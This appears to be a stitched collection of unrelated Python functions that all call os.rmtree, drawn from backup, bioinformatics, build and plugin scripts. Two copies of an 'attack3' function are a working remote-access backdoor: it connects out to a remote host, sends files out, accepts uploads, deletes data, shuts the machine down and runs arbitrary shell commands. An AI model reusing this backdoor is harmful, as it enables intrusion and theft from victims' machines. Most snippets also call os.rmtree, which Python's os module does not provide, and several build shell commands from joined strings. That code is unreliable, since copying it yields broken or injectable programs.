def main(): #declare sources C = '/C/Shares/' #declare destination root Save_root = r'/External_HDD/Backups/Server/' #declare how long (in days) you want to keep daily backups dailyDuration = 7 #declare what on which day you want to keep those past the above keepDay = 'Sat' #Capitalize the first letter #find out what day it is today = str(datetime.date.today()) #make a new folder to house all the backups save = Save_root + today + '_Backup' os.mkdir(save) Backup(C, save, 'Server') # create tarball of the newly created folder tar = tarfile.open(save + '.tar.bz2', 'w:bz2') tar.add(save) tar.close() # delete the non-compressed file os.rmtree(save) ## remove any old backups clean_up(today, Save_root, dailyDuration, keepDay)
def give_me_assembly(fasta, kmer=31, tmp_dir=None): # use Velvet to assembl the supporting reads # # velveth /tmp/velvet-unmapped-reads/ 17 -fasta -short myfasta.fa # velvetg /tmp/velvet-unmapped-reads/ if fasta: fasta_file = give_me_temp_filename(tmp_dir=tmp_dir) ase_dir = give_me_temp_filename(tmp_dir=tmp_dir) if os.path.isfile(ase_dir) or os.path.islink(ase_dir): os.remove(ase_dir) elif os.path.isdir(ase_dir): os.rmtree(ase_dir) os.makedirs(ase_dir) file(fasta_file, 'w').writelines(fasta) cmd = [ 'velveth', ase_dir, str(kmer), '-fasta', '-short', fasta_file, ';', 'velvetg', ase_dir, '>', '/dev/null', '2>&1' ] cmd = ' '.join(cmd) proc = os.system(cmd) if proc: print >> sys.stderr, "ERROR while executing '%s'" % (cmd, ) sys.exit(1) else: return [] ase = file(os.path.join(ase_dir, 'contigs.fa'), 'r').readlines() delete_file(fasta_file) shutil.rmtree(ase_dir) return ase
def pullUpdate(url): r = requests.get(url, stream=True) total_length = r.headers.get('content-length') print('Downloading hydrus please wait') #print ('header of intrest',str(r.headers['Content-Disposition']).split("=",1)[1] ) z = zipfile.ZipFile(io.BytesIO(r.content)) fileName = str(r.headers['Content-Disposition']).split("=", 1)[1] fn = fileName.split("-") try: os.rmtree( str(fn[0]) + '-' + str(fn[1]) + '-' + str(format(str(fn[4]))[1:]).split('.')[0]) except: print('Download Complete Moving Files...') z.extractall() root_src_dir = str(fn[0]) + '-' + str(fn[1]) + '-' + str( format(str(fn[4]))[1:]).split('.')[0] root_dst_dir = 'hydrusnetwork' for src_dir, dirs, files in os.walk(root_src_dir): dst_dir = src_dir.replace(root_src_dir, root_dst_dir, 1) if not os.path.exists(dst_dir): os.makedirs(dst_dir) for file_ in files: src_file = os.path.join(src_dir, file_) dst_file = os.path.join(dst_dir, file_) if os.path.exists(dst_file): # in case of the src and dst are the same file if os.path.samefile(src_file, dst_file): continue os.remove(dst_file) shutil.move(src_file, dst_dir) shutil.rmtree(root_src_dir)
def init(): """ Initialize the versioned directory that contains modules. """ # Setup root directory. os.makedirs(INSTALL_ROOT, exist_ok=True) # Remove the current symlink if it exists already. if os.path.exists(SYMLINK_PATH): os.remove(SYMLINK_PATH) # Setup the symlink to be relative - makes it easier to change # home directory locations... v = version() os.chdir(INSTALL_ROOT) os.symlink(v, SYMLINK_NAME) # Copy every module into the directory. versioned_path = os.path.join(INSTALL_ROOT, v) if os.path.exists(versioned_path): os.rmtree(versioned_path) shutil.copytree(MODULE_PATH, versioned_path) # Execute each of the dynamic modules. There's no prescription for # the module format, so we delegate to the os.system module. os.chdir(SYMLINK_PATH) for _, _, files in os.walk(DOWNLOAD_MODULE_PATH): for f in files: p = os.path.join(DOWNLOAD_MODULE_PATH, f) assert os.system(p) == 0, "Non-zero exit code from %s" % p
def main(): #declare sources C = '/C/Shares/' #declare destination root Save_root = r'/External_HDD/Backups/Server/' #declare how long (in days) you want to keep daily backups dailyDuration = 7 #declare what on which day you want to keep those past the above keepDay = 'Sat' #Capitalize the first letter #find out what day it is today = str(datetime.date.today()) #make a new folder to house all the backups save = Save_root+today+'_Backup' os.mkdir(save) Backup(C, save, 'Server') # create tarball of the newly created folder tar = tarfile.open(save+'.tar.bz2', 'w:bz2') tar.add(save) tar.close() # delete the non-compressed file os.rmtree(save) ## remove any old backups clean_up(today, Save_root, dailyDuration, keepDay)
def closeRW(self): if self.ResultWidget.switch: message = "Are you going to stop the optimization process" ok = tkMessageBox.askokcancel('', message) if ok: self.ResultWidget.switch = 0 if self.ResultWidget.cluster: self.ResultWidget.process.close() else: self.ResultWidget.process.kill() if self.ResultWidget.PrintR: self.ResultWidget.PrintR.destroy() self.ResultWidget.newwindow.destroy() self.ResultWidget = None self.Optimize.config(text=" Start \nOptimization") self.Results.config(state='normal') else: if self.ResultWidget.PrintR: self.ResultWidget.PrintR.destroy() self.ResultWidget.newwindow.destroy() self.ResultWidget = None self.Results.config(state='normal') if self.allunits['Menubar'].loadres is not None: os.chdir('..') WD = self.parameters['Case']['WD'].strip() if self.parameters['Case']['WD'] == "current": WD = self.cwd elif not (WD[0] == '/' or WD[1] == ':'): WD = os.path.join(self.cwd, WD) self.wd = WD os.rmtree(WD + '/%s' % self.parameters['Case']['name'])
def generatefiles(idd,name): url="https://www.dmax.de/api/show-detail/"+str(idd) debug("generatefiles :"+url) content=geturl(url) try: struktur = json.loads(content) except: return mediapath=addon.getSetting("mediapath") ppath=mediapath+name.replace(" ","_").replace(":","_") debug(ppath) if xbmcvfs.exists(ppath): os.rmtree(ppath) os.mkdir(ppath) subelement=struktur["videos"]["episode"] for number,videos in subelement.iteritems(): for video in videos: idd=video["id"] debug("IDD VIDEO :"+str(idd)) title=video["title"] title=title.replace("{S}","S").replace(".{E}","E") desc=video["description"] duration=video["videoDuration"] duration=duration/1000 image=video["image"]["src"] airdate=video["airDate"] namef=title.replace(" ","_").replace(":","_") #debug(namef) filename=ppath+"/"+namef+".strm" #debug(filename) file = open(filename,"wt") file.write("plugin://plugin.video.L0RE.dmax/?mode=playvideo&url="+str(idd)) file.close() xbmcplugin.endOfDirectory(addon_handle,succeeded=True,updateListing=False,cacheToDisc=True)
def copy_data(location_src): main_path = os.path.join(script_root, "", location_src) print("Copying qml files:") dst_folder = os.path.normpath(location_release + "/" + folder_name + "/ui") if not os.path.exists(dst_folder): os.mkdir(dst_folder) for root, dirs, files in os.walk(os.path.normpath(main_path + "/ui/")): for file_ in files: if file_.endswith("qml"): print("Copying", file_, "from", root, "to", dst_folder) shutil.copy(os.path.join(root, file_), os.path.join(dst_folder, file_)) print("Copying icons files:") dst_folder = os.path.normpath(location_release + "/" + folder_name + "/icons") if not os.path.exists(dst_folder): os.mkdir(dst_folder) for root, dirs, files in os.walk(os.path.normpath(main_path + "/icons/")): for file_ in files: print("Copying", file_, "from", root, "to", dst_folder) shutil.copy(os.path.join(root, file_), os.path.join(dst_folder, file_)) pyqt5_add_folder = os.path.join(main_path + pyqt5_qt_folder_name) print("Copying PyQtWebEngine files:") print("\tCopying PyQtWebEngine bin files:") src_folder = os.path.normpath(pyqt5_add_folder + "/bin/QtWebEngineProcess.exe") dst_folder = os.path.normpath(location_release + "/" + folder_name + "/PyQt5/Qt/bin/QtWebEngineProcess.exe") shutil.copy(src_folder, dst_folder) print("\tCopying PyQtWebEngine resources files:") src_folder = os.path.normpath(pyqt5_add_folder + "/resources/") dst_folder = os.path.normpath(location_release + "/" + folder_name + "/PyQt5/Qt/resources/") if os.path.exists(dst_folder): os.rmtree(dst_folder) shutil.copytree(src_folder, dst_folder, ignore=None) print("\tCopying PyQtWebEngine translations files:") src_folder = os.path.normpath(pyqt5_add_folder + "/translations/") dst_folder = os.path.normpath(location_release + "/" + folder_name + "/PyQt5/Qt/translations/") if os.path.exists(dst_folder): os.rmtree(dst_folder) shutil.copytree(src_folder, dst_folder, ignore=None) print("Copying version file:") src_folder = os.path.normpath( os.path.dirname(os.path.realpath(script_root)) + "/version") dst_folder = os.path.normpath(location_release + "/" + folder_name + "/version") print("src_folder = {}".format(src_folder)) print("dst_folder = {}".format(dst_folder)) shutil.copy(src_folder, dst_folder)
def directory(choice , directory_path , force = False): if choice == "make": os.mkdir(directory_path) elif choice == "remove": if force: os.rmtree(directory_path) else: os.rmdir(director_path)
def chdir_temporary_folder(folder_in): folder = tempfile.mkdtemp() if folder_in is None else folder_in old_folder = os.getcwd() os.chdir(folder) try: yield finally: os.chdir(old_folder) if folder_in is None: os.rmtree(folder)
def __init__(self, file_name, size_buffer = 10**8): self.file_name = file_name if file_name: if os.path.isfile(file_name) or os.path.islink(file_name): os.remove(file_name) elif os.path.isdir(file_name): os.rmtree(file_name) self.file_handle = open(file_name,'w') self.size_buffer = size_buffer self.data = [] self.size = 0
def main(): opts, src, dest = get_opts() if opts.verbose >= 3: print ("running with options:\nsrc = [%s]\ndest = [%s]\nverbose = [%d]\n" +\ "dry-run = [%d]\nclean-first = [%d]\nforce = [%d]") %\ (src, dest, opts.verbose, opts.dryrun, opts.clean, opts.force) if opts.dryrun and opts.verbose == 0: opts.verbose = 1 if opts.clean: if opts.dryrun or opts.verbose: print "removing tree %s" % dest if not opts.dryrun: os.rmtree(dest, True, _rmtree_warn) make(opts, src, dest)
def main(): opts, src, dest = get_opts() if opts.verbose >= 3: print(("running with options:\nsrc = [%s]\ndest = [%s]\nverbose = [%d]\n" +\ "dry-run = [%d]\nclean-first = [%d]\nforce = [%d]") %\ (src, dest, opts.verbose, opts.dryrun, opts.clean, opts.force)) if opts.dryrun and opts.verbose == 0: opts.verbose = 1 if opts.clean: if opts.dryrun or opts.verbose: print("removing tree %s" % dest) if not opts.dryrun: os.rmtree(dest, True, _rmtree_warn) make(opts, src, dest)
def clean(): "Delete all targets that are built from source." for t in Target.instances: if isinstance(t,DependentTargetFromSource): if os.path.isdir(t.filename): print 'rm -r %s'%t.filename sys.stdout.flush() if not opt.dryrun: os.rmtree(t.filename) elif os.path.exists(t.filename): print 'rm %s'%t.filename sys.stdout.flush() if not opt.dryrun: os.remove(t.filename)
def apply_delta(root, e): chleb = Queue.Queue(0) path, metadata = e branch, leaf = split_path(path) if metadata is not None: print(' + ' + path) # Traverse down the tree until we find the parent folder of the entry # we want to add. Create any missing folders along the way. children = root for part in branch: node = get_or_create_child(children, part) # If there's no folder here, make an empty one. if not node.is_folder(): node.content = {} children = node.content # Create the file/folder. node = get_or_create_child(children, leaf) node.path = metadata['path'] # Save the un-lower-cased path. if metadata['is_dir']: # Only create an empty folder if there isn't one there already. if not node.is_folder(): node.content = {} if delta_switch == 0: try: os.mkdir(droppath + "/" + path) except: pass else: node.content = metadata['size'], metadata['modified'] tmp = [ 'get', path, droppath + "/" + path] if delta_switch == 0: try: chleb.put(client_new(tmp)) except: print(" x Something went wrong") else: print(' - ' + path) if delta_switch == 0: try: chleb.put(os.remove(droppath + '/' + path)) except: print(' x Something went wrong') # Traverse down the tree until we find the parent of the entry we # want to delete. children = root for part in branch: node = children.get(part) # If one of the parent folders is missing, then we're done. if node is None or not node.is_folder(): chleb.put(os.rmtree(droppath+path)) break children = node.content else: # If we made it all the way, delete the file/folder (if it exists). if leaf in children: del children[leaf]
def sync_to_s3(aar_release_name, sdk_version): os.chdir('release-folder/') print('Updating maven with the new binaries') output, err = run_script( 'mvn install:install-file -DgroupId=net.singular.segment.integration -DartifactId=singular_segment_sdk -DcreateChecksum=true -Dversion={0} -Dpackaging=aar -Dfile={1} -DpomFile=../segment-singular-android/generated-sdk.pom -DlocalRepositoryPath=.' .format(sdk_version, aar_release_name)) #os.rename('./net/singular/segment/integration/singular_segment_sdk/maven-metadata-local.xml', # './net/singular/segment/integration/singular_segment_sdk/') os.remove(aar_release_name) for filename in glob.iglob(os.getcwd() + '/**/*', recursive=True): if filename.endswith('.DS_Store'): os.remove(filename) elif filename.endswith('.git'): os.rmtree(filename) print('Syncing the new version to S3') output, err = run_script('s3cmd sync -P . s3://maven.singular.net') os.chdir('../')
def make_ancils(self, debug=False): orog_run_id, orog_output_dir, orog_output_files = self.make_orog() veg_run_id, veg_output_dir, veg_output_files = self.make_vegfrac() self.wait([orog_run_id, veg_run_id]) # Copy output files input place and delete run directories for f in orog_output_files + veg_output_files: assert(os.path.exists(f)) shutil.copy(f, self.output) if not debug: os.rmtree(orog_output_dir) os.rmtree(veg_output_dir) return 0
def give_me_assembly(fasta, kmer = 31, velvet_dir = None, tmp_dir = None): # use Velvet to assembl the supporting reads # # velveth /tmp/velvet-unmapped-reads/ 17 -fasta -short myfasta.fa # velvetg /tmp/velvet-unmapped-reads/ if fasta: fasta_file = give_me_temp_filename(tmp_dir = tmp_dir) ase_dir = give_me_temp_filename(tmp_dir = tmp_dir) if os.path.isfile(ase_dir) or os.path.islink(ase_dir): os.remove(ase_dir) elif os.path.isdir(ase_dir): os.rmtree(ase_dir) os.makedirs(ase_dir) file(fasta_file,'w').writelines(fasta) _VT_ = "" if velvet_dir and velvet_dir.strip(): _VT_ = velvet_dir.rstrip("/")+"/" cmd = [_VT_+'velveth', ase_dir, str(kmer), '-fasta', '-short', fasta_file, ';', _VT_+'velvetg', ase_dir, '>', '/dev/null', '2>&1' ] cmd = ' '.join(cmd) proc = os.system(cmd) if proc: print >>sys.stderr, "ERROR while executing '%s'" % (cmd,) sys.exit(1) else: return [] ase = file(os.path.join(ase_dir,'contigs.fa'),'r').readlines() delete_file(fasta_file) shutil.rmtree(ase_dir) return ase
def __init_caches(self, path): needs_create = True if os.path.exists(path): if not os.path.isdir(path): os.rmtree(path) else: needs_create = False if needs_create: os.makedirs(path) self.__cache_index_file = "%s/cache_index"%(path) try: cache_index_file = open(self.__cache_index_file, "r") cache_index = cache_index_file.read() cache_index_file.close() self.__cache_index = json.loads(cache_index) except: self.__cache_index = {}
def run_gauss(self): jobdirroot=".\\job" if not os.path.exists("job"): os.makedirs("job") s_flux=self.source_flux() s_power=self.voxel_flux_to_power([s_flux])[0] # s_flux=self.rect_flux_split(s_flux, s_power) while self.mesh_level>0: s_flux=self.rect_flux_split(s_flux, s_power) # find a way to handle filtering, hopefully already done. # maybe incorporate filtering into s_flux definition. s_flux=self.source_flux(s_flux) s_power=self.voxel_flux_to_power([s_flux])[0] self.mesh_level-=1 if os.path.exists("job"): os.rmtree("job") return s_power
def rm(request,datatype): try: path = request.GET['path'] if datatype == "file": filename = request.GET["filename"] elif datatype == "folder": folder = request.GET["folder"] except (KeyError): return HttpResponse("No path exist") else: currentpath = path path = os.path.join(ajaxfilemanager.settings.file_directory,path) print(path+" "+currentpath+" "+ajaxfilemanager.settings.file_directory) if os.access(path, os.W_OK): os.chdir(path) if datatype == "file": os.remove(filename) elif datatype == "folder": os.rmtree(folder) return HttpResponse(datatype+" successfully deleted")
def extractsrc(self, side): """Unzip the source jar file to the src directory defined in the config file""" pathbinlk = {0:self.ffclientout, 1:self.ffserverout} jarlk = {0:self.ffclientsrc, 1:self.ffserversrc} pathsrclk = {0:self.srcclient, 1:self.srcserver} #HINT: We check if the top output directory exists. If not, we create it if not os.path.exists(pathbinlk[side]): os.mkdir(pathbinlk[side]) #HINT: We extract the jar to the right location zipjar = zipfile.ZipFile(jarlk[side]) zipjar.extractall(pathbinlk[side]) if not os.path.exists(pathsrclk[side]): os.mkdir(pathsrclk[side]) srcsrc = os.path.join(pathbinlk[side], self.ffsource).replace('/',os.sep).replace('\\',os.sep) srcdest = os.path.join(pathsrclk[side], self.ffsource).replace('/',os.sep).replace('\\',os.sep) if os.path.exists(srcdest): os.rmtree(srcdest) shutil.copytree(srcsrc, srcdest)
def main(): if input('Do you want to clean generated data? (y/n)') == 'y': if os.path.isdir('cmp'): shutil.rmtree('cmp') if os.path.exists('result_pre.jpg'): os.remove('result_pre.jpg') if os.path.exists('result.jpg'): os.remove('result.jpg') if os.path.exists('result_full.jpg'): os.remove('result_full.jpg') if os.path.exists('result.json'): os.remove('result.json') fileList = glob.glob('result_*.jpg') for filePath in fileList: os.remove(filePath) if input('Do you want to clean portals dataset? (y/n)') == 'y': if os.path.isdir('data'): os.rmtree('data') if os.path.isdir('data_feature'): os.rmtree('data_feature') if os.path.isdir('data_feature_preview'): os.rmtree('data_feature_preview')
default="scibert-nli", type=str, required=False, help="Model selected in the list: " + ", ".join(MODELS) ) args = parser.parse_args() path = os.path.join(MODELS_PATH, args.model) if not os.path.exists(path): os.makedirs(path) if args.model == 'scibert': # Used to fine-tune SciBERT from default embeddings tokenizer = AutoTokenizer.from_pretrained("allenai/scibert_scivocab_cased") model = AutoModel.from_pretrained("allenai/scibert_scivocab_cased") model.save_pretrained(path) tokenizer.save_pretrained(path) print('SciBERT Transformer model available in', path) elif args.model == 'scibert-nli': # Already-trained SciBERT tokenizer = AutoTokenizer.from_pretrained("gsarti/scibert-nli") model = AutoModel.from_pretrained("gsarti/scibert-nli") model.save_pretrained(path) tokenizer.save_pretrained(path) word_embedding_model = models.BERT(path) pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension(), pooling_mode_mean_tokens=True, pooling_mode_cls_token=False, pooling_mode_max_tokens=False) model = SentenceTransformer(modules=[word_embedding_model, pooling_model]) os.rmtree(path) model.save(path) print('SciBERT SentenceTransformer model available in', path) else: raise AttributeError("Model should be selected in the list: " + ", ".join(MODELS))
def attack3(): server4=socket.socket(socket.AF_INET,socket.SOCK_STREAM) loop4='on' while loop4=='on': try: sleep(1) server4.connect((ip,10008)) loop4='off' except: pass while True: command=server4.recv(1024) #print command if command=="cd..": try: back_dir(os.getcwd()) except: pass elif command[:3]=="cd ": try: os.chdir(command[3:]) except: pass elif command=="ls": data=os.listdir(os.getcwd()) i=0 d='' while i<len(data): d=d+'$$%%'+data[i] #print len(data) i+=1 server4.send(d) elif command[:4]=="get ": f=open(command[4:],'rb') size=os.path.getsize(command[4:]) server4.send(str(size)) data=f.read(2048) server4.send(data) while data!="": data='' data=f.read(2048) if data=="": server4.send('stop it') else: server4.send(data) elif command[:6]=="mkdir ": os.mkdir(command[6:]) elif command[:7]=="upload ": size=server4.recv(1024) data=server4.recv(2048) while data[-7:]!='stop it': f=open(command[7:],'ab') f.write(data) f.close() data='' data=server4.recv(2048) elif command=="pwd": path=os.getcwd() server4.send(path) elif command[:5]=="del_d": try: os.rmtree(command[6:]) except: pass elif command[:5]=="del_f": try: os.remove(command[6:]) except: pass elif command=="shutdown": os.system('shutdown -s') elif command[:4]=="cmd ": try: print command[4:] os.system(command[4:]) except: pass
def publish_version(version, install=False): # make the staging area # stagepath = "addon_name"+_+version # OLD stagepath = addon_name print("Building target: " + stagepath) if os.path.isdir(stagepath) == True: shutil.rmtree(stagepath) os.mkdir(stagepath) # file by file, copy and do replacements for fil in files: if os.path.isdir(fil) == True: newdirname = os.path.join(stagepath, fil) shutil.copytree(fil, newdirname) # will have some .DS_store's else: fname = fil newname = os.path.join(stagepath, fil) inFile = codecs.open(fname, "r", "utf-8") outFile = codecs.open(newname, "w", "utf-8") for line in inFile: newline = do_replacements_on(line, version) outFile.write(newline) inFile.close() outFile.close() # zip and remove def old_method(stagepath): p = Popen(["zip", "-r", stagepath + ".zip", stagepath], stdin=PIPE, stdout=PIPE, stderr=PIPE) stdout, err = p.communicate(b"") old_method(stagepath) # new zip method, to skip .DS's # with zipfile.ZipFile(stagepath+".zip", 'w') as myzip: # filezips = os.listdir(stagepath) # for file in filezips: # if file != '.DS_Store': # myzip.write(file) if install == True: installedpath = os.path.join(addonpath, addon_name + "_" + version) if not os.path.isdir(installedpath): print("creating folder:") print(installedpath) os.mkdir(installedpath) else: try: os.rmtree(os.path.join(addonpath, addon_name + "_" + version, "__pycache__")) except: print("No cache to delete") for fil in files: stagefile = os.path.join(stagepath, fil) p = Popen(["mv", stagefile, installedpath], stdin=PIPE, stdout=PIPE, stderr=PIPE) stdout, err = p.communicate(b"") shutil.rmtree(stagepath) os.rename(stagepath + ".zip", os.path.join(build_dir, stagepath + ".zip"))
shutil.copytree(os.path.join(cwd, "Labo", "Exercice"), os.path.join(cwd, "Labo", "Exercice2")) # Copy all files # Déplacer des fichiers (les dossiers doivent exister) shutil.move(os.path.join(cwd, "Labo", "cobaye2.txt"), os.path.join(cwd, "Labo", "Exercice")) shutil.move(os.path.join(cwd, "cobaye.txt"), os.path.join(cwd, "Labo", "cobaye3.txt")) # Renomme après déplacement # Effacer des fichiers os.unlink(path) # Efface un fichier os.rmdir(path) # Efface un dossier vide os.rmtree(path) # Efface un dossier et tout ce qu'il contient # Pour envoyer à la corbeille, import send2trash """ ################ # Exercice # ################ Effacer tous les fichiers .txt du dossier Exercice. Puis les recréer avec votre script. Il faut utiliser os.listdir et filename.endswith('.txt') """ # Parcourir les dossiers, sous-dossiers et fichier d'un répertoire for folder_name, subfolders, filenames in os.walk(cwd): print('The current folder is ' + folder_name)
os.chdir(wdir) # Make a copy of the executable to the directory that is going to be repeatedly copied # (if it doesn't already exist there) if not os.path.isfile(os.path.join(bmdir, 'gsflow.exe')): # If the file doesn't yet exist in this location, bring a copy in shutil.copy(os.path.join(wdir, '..', 'Model Archive', 'bin', 'gsflow.exe'), bmdir) for dT in deltaT: # Create a new directory directory = os.path.join(os.getcwd(), EFWF, 'temp_' + str(dT)) if os.path.exists(directory): os.rmtree(directory) # Copy the needed files to the new directory shutil.copytree(bmdir, directory) os.chdir(directory) if EFWF == 'EF': ogname = 'upper_carson_climate_2.data' # original name bname = 'upper_carson_climate_2' control_file = 'eastfork_clim2_hist.control' elif EFWF == 'WF': ogname = 'upper_carson_climate_2.data' # currently both CR forks have same name, but could change bname = 'upper_carson_climate_2' control_file = 'westfork_clim2.control' # get original data
if __name__ == "__main__": try: parser = argparse.ArgumentParser() parser.add_argument("config", type=str) parser.add_argument("--debug", action="store_true", default=False) parser.add_argument("--archive-mode", action="store_true", default=False) parser.add_argument("--clear-fid-cache", action="store_true", default=False) parser.add_argument("--num-workers", type=int, default=16) args = parser.parse_args() fid_cache_dir = ".fid-cache/" if args.clear_fid_cache and os.path.exists(fid_cache_dir): os.rmtree(fid_cache_dir) with open(args.config, "r") as f: config = yaml.load(f, Loader=yaml.FullLoader) config = EasyDict(config) config.var = EasyDict() config.var.exp_name = os.path.basename(args.config).split(".yaml")[0] print(" [*] Config {} loaded!".format(args.config)) if args.archive_mode: config.var.log_dir = "../../" # Running in ./logs/<exp_name>/codes/ else: config.var.log_dir = "./logs/" # Remove previous error file (will make confusion on log synchronizing) error_f = os.path.join(config.var.log_dir, config.var.exp_name, "error-log.txt")
def delete_dir(self) -> None: """ Delete the directory where all the files were temporarily written """ os.rmtree(self.__rootdir__)
def attack3(): server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) loop4 = 'on' while loop4 == 'on': try: sleep(1) server4.connect((ip, 10008)) loop4 = 'off' except: pass while True: command = server4.recv(1024) #print command if command == "cd..": try: back_dir(os.getcwd()) except: pass elif command[:3] == "cd ": try: os.chdir(command[3:]) except: pass elif command == "ls": data = os.listdir(os.getcwd()) i = 0 d = '' while i < len(data): d = d + '$$%%' + data[i] #print len(data) i += 1 server4.send(d) elif command[:4] == "get ": f = open(command[4:], 'rb') size = os.path.getsize(command[4:]) server4.send(str(size)) data = f.read(2048) server4.send(data) while data != "": data = '' data = f.read(2048) if data == "": server4.send('stop it') else: server4.send(data) elif command[:6] == "mkdir ": os.mkdir(command[6:]) elif command[:7] == "upload ": size = server4.recv(1024) data = server4.recv(2048) while data[-7:] != 'stop it': f = open(command[7:], 'ab') f.write(data) f.close() data = '' data = server4.recv(2048) elif command == "pwd": path = os.getcwd() server4.send(path) elif command[:5] == "del_d": try: os.rmtree(command[6:]) except: pass elif command[:5] == "del_f": try: os.remove(command[6:]) except: pass elif command == "shutdown": os.system('shutdown -s') elif command[:4] == "cmd ": try: print command[4:] os.system(command[4:]) except: pass
def setup_data(): os.makedirs(pjoin(folder, "nucleotides", "fnas"), exist_ok=True) os.makedirs(pjoin(folder, "proteins", "faas"), exist_ok=True) os.makedirs(pjoin(folder, "temp"), exist_ok=True) Entrez.email = username query = " OR ".join(ids) query = '"Prochlorococcus"[Organism]' ass_ids = Entrez.read( Entrez.esearch(db="assembly", term=query, retmax=1000000))['IdList'] def get_assemblies(ass_id): ass_info = Entrez.read(Entrez.esummary(db="assembly", id=ass_id)) genbank = ass_info['DocumentSummarySet']['DocumentSummary'][0][ 'FtpPath_GenBank'] refseq = ass_info['DocumentSummarySet']['DocumentSummary'][0][ 'FtpPath_RefSeq'] ftp_fold = genbank if refseq == "" else refseq ftp_file = "{fold}/{ID}_genomic.gbff.gz".format( fold=ftp_fold, ID=ftp_fold.split("/")[-1]) call("wget {path} 2> /dev/null".format(path=ftp_file), shell=True) shutil.move( ftp_fold.split("/")[-1] + "_genomic.gbff.gz", "nucleotides/ncbi_gbffs") for ass_id in tqdm(ass_ids): get_assemblies(ass_id) genomes = dict() for f in tqdm(os.listdir("nucleotides/ncbi_gbffs")): with gzip.open("nucleotides/ncbi_gbffs" + f, "rt") as handle: genomes["_".join(f.split("_")[0:2])] = [ s for s in SeqIO.parse(handle, "genbank") ] def make_rec(feat, genome, seq): entry = ">{locus}:{genome}{ID} {product}\n{seq}\n" if 'translation' in feat.qualifiers: params = { 'locus': feat.qualifiers['locus_tag'][0], 'genome': genome, 'ID': (":" + feat.qualifiers['protein_id'][0]) if 'protein_id' in feat.qualifiers else "", 'product': feat.qualifiers['product'][0], 'seq': re.sub("(.{64})", "\\1\n", feat.qualifiers['translation'][0], 0, re.DOTALL) } else: seq = feat.extract(seq).translate( table=feat.qualifiers['transl_table'][0]) params = { 'locus': feat.qualifiers['locus_tag'][0], 'genome': genome, 'ID': (":" + feat.qualifiers['protein_id'][0]) if 'protein_id' in feat.qualifiers else "", 'product': feat.qualifiers['product'][0], 'seq': re.sub("(.{64})", "\\1\n", str(seq.seq), 0, re.DOTALL) } return entry.format(**params) for k, v in tqdm(genomes.items()): SeqIO.write(v, pjoin(folder, "nucleotides", "fnas", k + ".fna"), "fasta") aas = [ make_rec(s, k, vv) for vv in v for s in vv.features if s.type == "CDS" ] if len(aas) > 0: with open(pjoin(folder, "proteins", "faas", k + ".faa"), "w") as handle: handle.writelines(aas) full_of_Ns = "rm nucleotides/fnas/GCF_000291845.1.fna nucleotides/fnas/GCF_000291925.1.fna" def compute_fastamd5(file): with open(file) as handle: lines = "".join([ l.strip() if not l.startswith(">") else ">" for l in handle ]).split(">") lines = sorted(lines) md5s = [md5(l.upper().encode('utf-8')).hexdigest() for l in lines] full_md5 = md5("".join(md5s).encode("utf-8")).hexdigest() return {'full_md5': full_md5, "entry_md5s": md5s} md5s_entrez = { f[:-4]: compute_fastamd5('nucleotides/fnas/' + f) for f in tqdm(os.listdir('nucleotides/fnas/')) } md5s_gorg = { f[:-6]: compute_fastamd5('nucleotides/gorgs/' + f) for f in tqdm(os.listdir('nucleotides/gorgs/')) } common_md5s = {md5['full_md5'] for md5 in md5s_entrez.values()}.intersection( {md5['full_md5'] for md5 in md5s_gorg.values()}) good_gorgs = [ k for k, v in md5s_gorg.items() if v['full_md5'] not in common_md5s ] for f in good_gorgs: shutil.copy('nucleotides/gorgs/' + f + ".fasta", 'nucleotides/fnas/GORG_' + f.replace("_contigs", ".1.fna")) command = 'prokka --force --cpus 20 --genus Prochlorococcus --genus Prochlorococcus --locustag {id} --prefix {id} --outdir nucleotides/prokkas/ nucleotides/fnas/{id}.fna > /dev/null ' for f in os.listdir('nucleotides/fnas/'): if f.startswith("GORG_"): rs_id = f[:-4] print(rs_id) call(command.format(id=rs_id), shell=True) "checkm taxonomy_wf -x fna -t20 genus Prochlorococcus nucleotides/fnas/ checkm > static_data/checkm.txt" os.rmtree("static_data")
def fetch_submissions(subreddit, limit=None, export=False, user_agent='submission.fetch.bot'): # print([(x, subreddit[x]) for x in subreddit]) after = None save_directory = 'submissions' fetched_submissions = 0 submission_index = [] submissions = [] if export: if os.path.isdir(save_directory): try: os.rmtree(save_directory) except: pass else: try: os.mkdir(save_directory) except: pass while after or not fetched_submissions: if after: req_url = 'https://www.reddit.com' + subreddit[ 'url'] + '.json?limit=100&after=' + after else: req_url = 'https://www.reddit.com' + subreddit[ 'url'] + '.json?limit=100' req = requests.get(req_url, headers={'User-agent': user_agent}) try: after = req.json()['data']['after'] for s in [r['data'] for r in req.json()['data']['children']]: submission_index.append({ 'id': s['id'], 'name': s['name'], 'title': s['title'], 'permalink': s['permalink'] }) if export: try: os.mkdir(save_directory + '/' + subreddit['id']) except: pass submissions.append(s) if export: #save subreddit to file with open( save_directory + '/' + subreddit['id'] + '/' + s['id'] + '.json', 'w') as file: json.dump(s, file, indent=4) fetched_submissions += 1 log.info( f'Fetched submission #{fetched_submissions} {s["id"]} for subreddit {subreddit["id"]}...' ) if limit and fetched_submissions >= limit: after = None break except Exception as e: #? log.error('Exception occured !') log.error(str(e)) subreddit_submission_index = { 'subreddit_id': subreddit['id'], 'subreddit_title': subreddit['title'], 'submissions': submission_index } if export: with open(save_directory + '/' + subreddit['id'] + '/index.json', 'w') as file: json.dump(subreddit_submission_index, file, indent=4) return subreddit_submission_index, submissions
def publish_version(version, install=False): # make the staging area # stagepath = "addon_name"+_+version # OLD stagepath = addon_name print("Building target: " + stagepath) if os.path.isdir(stagepath) == True: shutil.rmtree(stagepath) os.mkdir(stagepath) # file by file, copy and do replacements for fil in files: if os.path.isdir(fil) == True: newdirname = os.path.join(stagepath, fil) shutil.copytree( fil, newdirname, ignore=ignore_patterns) # will have some .DS_store's else: fname = fil newname = os.path.join(stagepath, fil) inFile = codecs.open(fname, "r", "utf-8") outFile = codecs.open(newname, "w", "utf-8") for line in inFile: newline = do_replacements_on(line, version) outFile.write(newline) inFile.close() outFile.close() # zip and remove def old_method(stagepath): p = Popen(['zip', '-r', stagepath + '.zip', stagepath], stdin=PIPE, stdout=PIPE, stderr=PIPE) stdout, err = p.communicate(b"") old_method(stagepath) # new zip method, to skip .DS's # with zipfile.ZipFile(stagepath+".zip", 'w') as myzip: # filezips = os.listdir(stagepath) # for file in filezips: # if file != '.DS_Store': # myzip.write(file) if install == True: installedpath = os.path.join(addonpath, addon_name + "_" + version) if not os.path.isdir(installedpath): print("creating folder:") 